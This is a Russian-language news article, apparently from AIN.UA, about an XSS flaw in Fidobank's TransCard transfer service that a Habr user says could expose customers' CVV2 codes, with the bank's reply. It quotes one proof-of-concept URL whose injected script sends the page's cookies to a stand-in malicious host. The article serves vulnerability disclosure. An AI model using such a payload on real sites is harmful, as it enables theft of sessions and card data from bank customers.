Обнаружена уязвимость, которая позволяет украсть CVV2-код пользователя «Фидобанка»

5553
2

В сервисе мгновенного перевода средств с карты на карту украинского банка «Фидобанк» обнаружилась уязвимость, с помощью которой злоумышленники могут узнать CVV2-код пользователя через интернет. Этот код очень важен — зная его, намного проще взломать счет и получить доступ к денежным средствам. Уязвимость обнаружил пользователь «Хабра» под ником dinikin, который ранее находил бреши и скрытые возможности в онлайн-сервисах «Альфа-банка». В «Фидобанке» говорят, что уязвимость не критична, но в течение суток обещают улучшить безопасность системы.

При помощи XSS-уязвимости злоумышленник, зная номер карты человека, который недавно делал денежный перевод через сервис «Фидобанка» TransCard, может получить CVV2-код его карты. Чтобы обеспечить себе полный доступ к счету, мошеннику останется лишь подобрать срок действия карты, а это всего два параметра — месяц и год.

Уязвимость была обнаружена в процессе пересылки средств с карты на карту через p2p-сервис «Фидобанка». «После осуществления платежа меня переадресовало на страницу вида pay.fidobank.ua/TransCard/pay?SenderTransID=TS1421332314712. Я решил проверить, фильтруется ли значение параметра SenderTransID, которое выводилось на странице. Естественно, оно не фильтровалось и давало возможность эксплуатации XSS-уязвимости. Я составил url, при переходе на который все куки отправлялись на фейковый псевдозловредный сайт someveryverydangeroussite.com. URL выглядел следующим образом:

https://pay.fidobank.ua/TransCard/pay?SenderTransID=<form method=get name=a action=https://someveryverydangeroussite.com><input name=b></form><script>document.a.b.value=document.cookie;alert(document.a.b.value);document.a.submit();</script>

Переход по этой ссылке показывал следующее сообщение:

Все бы ничего, если бы разработчики еще больше на облегчили работу по эксплуатации уязвимости, сохраняя cvv2 код в поле для его ввода даже после проведения платежа», — пишет dinikin.

По его мнению, из-за подобной уязвимости «Фидобанк» не смог бы пройти PCI DSS-сертификацию (стандарт безопасности данных индустрии платежных карт). «Хранить CVV2 каким-либо образом на сервере строго запрещено платежными системами Visa и MasterCard», — пояснил он. Впрочем, в комментариях пользователи «Хабра» пишут, что CVV не обязательно хранится на сервере, возможны и другие варианты, например, localStorage или в самой сессии.

Об обнаруженной уязвимости пользователь якобы сообщил в банк еще две недели назад, однако, судя по комментариям сотрудников «Фидобанка» в Facebook, ее до сих пор не устранили. «Пока можно пользоваться сервисом переводов с #FidoWallet, там все в порядке», — написал в обсуждении эксперт в сфере мобильного банкинга Сергей Скабелин. По его словам, сейчас на устранение уязвимости в банке брошены все силы. Этот факт косвенно может подтверждаться тем, что сервис TransCard периодически работает нестабильно.

В «Фидобанке» на запрос AIN.UA ответили, что банк уже провел анализ полученной информации об уязвимости. «В результате проверки было определено, что критичные данные клиента, в частности CVV2-код, не хранятся на ресурсе, следовательно, кража информации о CVV2 невозможна, — говорится в сообщении пресс-службы. — Мы благодарим клиента, обратившего наше внимание на этот аспект работы системы. В течение 24 часов в рамках обновления будет улучшена в том числе и безопасность сервиса онлайн-переводов».

Напомним, «Фидобанк» учредил Александр Адарич, позиционируя финучреждение как исключительно инновационную компанию, которая предлагает самые современные платежные и расчетные инструменты.

Оставить комментарий

Комментарии | 2

Поиск